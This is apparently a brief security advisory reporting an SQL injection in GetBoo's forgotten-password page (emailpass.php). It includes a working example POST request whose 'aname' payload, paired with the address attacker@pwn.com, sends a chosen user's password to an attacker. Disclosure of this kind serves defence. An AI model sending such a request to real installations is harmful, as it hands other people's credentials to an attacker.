GetBoo Email Forgotten Password SQL injection
Brought to you by:
chuckatsf
An attacker can leverage a POST to emailpass.php to send users passwords to an attacker-defined email address. This is done through an SQL injection vulnerability in the 'aname' field.
Example request
POST /getboo/emailpass.php HTTP/1.1 {snip} Content-Type: application/x-www-form-urlencoded Content-Length: 78 aname=') OR name='user' -- &email=attacker@pwn.com&newBtn=New+Password%21